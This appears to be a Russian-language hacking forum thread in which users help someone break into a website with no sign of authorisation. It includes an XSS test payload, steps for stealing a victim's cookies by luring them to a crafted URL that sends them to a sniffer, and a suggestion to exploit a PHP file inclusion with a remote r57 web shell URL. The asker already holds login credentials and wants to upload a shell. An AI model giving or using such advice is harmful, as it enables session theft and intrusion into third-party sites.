А скрипты работают? Вмысле <script>alert()</script> работает?

Да, работают

Ещё скрин

ДА че нам до твоих скринов...

А там авторизация по кукам есть?

пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?

там он фрейм вставляет

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

Ты сперва КСС от ИНКЛУДА резлечи хоть.

авторизация есть, но у меня уже есть username:password

я просто в пхп нифига не понимаю
если есть было бы хорошо визуальный шелл туда загрузить

точней кое что понимаю т.к. знаю asp